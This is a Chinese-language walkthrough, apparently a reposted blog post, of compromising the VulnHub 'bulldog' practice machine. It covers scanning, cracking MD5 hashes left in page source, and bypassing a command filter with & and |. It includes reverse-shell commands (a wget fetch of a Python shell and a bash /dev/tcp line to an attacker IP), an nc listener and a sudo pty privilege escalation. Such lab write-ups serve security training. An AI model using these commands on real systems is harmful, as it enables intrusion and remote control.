kali滲透綜合靶機(二)--bulldog靶機


kali滲透綜合靶機(二)--bulldog靶機

 

靶機下載地址:https://download.vulnhub.com/bulldog/bulldog.ova

一、主機發現

netdiscover -i eth0 -r 192.168.10.0/24

  

二、端口掃描

masscan --rate=10000 -p0-65535 192.168.10.154

  

三、服務識別

nmap -sV 192.168.10.154 -p23,8080,80

  

四、發現服務漏洞並利用

1.瀏覽器訪問http://192.168.10.152

2.目錄掃描

  

3.發現http://192.168.10.154/admin/login,嘗試弱口令登錄,失敗

  

4.發現http://192.168.10.154/dev/,然后訪問,查看頁面源碼,可以看到注釋有MD5的字符串,嘗試解密,解密出來bulldog   bulldoglover

  

5.嘗試使用郵箱用戶名登錄,失敗,嘗試用郵箱的開頭,成功登錄

  

6.發現http://192.168.10.154/dev/shell/ 訪問

  

5.1發現可能存在命令執行漏洞,嘗試輸入一些系統命令,發現對命令做了白名單限制,只允許給出的命令

嘗試使用;執行多個命令,“;”被過濾失敗,嘗試使用&,&&,|等方式執行多個命令,成功

  

5.2經過嘗試,存在命令執行漏洞

5.3之前服務識別發現web使用python搭建的,可以利用wget 遠程下載一個python反彈shell到目標服務器上,然后利用命令執行漏洞執行上傳到服務器的python腳本

5.3.1在遠程主機上搭建一個web站點,把python反彈shell腳本放入

或者使用echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash   反彈shell

  

python -m SimpleHTTPServer 80  開啟web服務

  

5.3.2在目標上執行ls|wget http://192.168.10.153/shell.py,遠程下載python 反彈shell腳本,

查看是否下載成功

  

  

5.3.3在遠程主機上開啟監聽 nc -nvlp 4444

  

5.3.4在目標上執行ls&python fantan.py,此時供給端已經成功得到目標的shell

  

5.3.5連接到目標的shell之后, 發現當前用戶屬於sudo組,嘗試切換賬戶失敗,需要終端

  

5.3.5切換到家目錄發現有個類似管理員的目錄,找到密碼

或者查找每個用戶的文件(不顯示錯誤)find / -user bulldogadmin 2>/dev/null

  

  

使用 strings打印其中的可打印字符,發現密碼

  

5.3.7連接到目標的shell,但是沒有反彈一個終端到攻擊端, 此時需要新建一個終端,拿到管理員權限

python -c 'import pty;pty.spawn("/bin/bash")'

sudo python -c 'import pty;pty.spawn("/bin/bash")'

注:先用python 開啟一個終端,報錯,然后用sudo python 開啟一個終端,達到提權的目的

  

 

總結:

1.信息收集

2.頁面源碼信息泄露

3.dirb爆破目錄

4.命令執行,反彈shell,提權


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM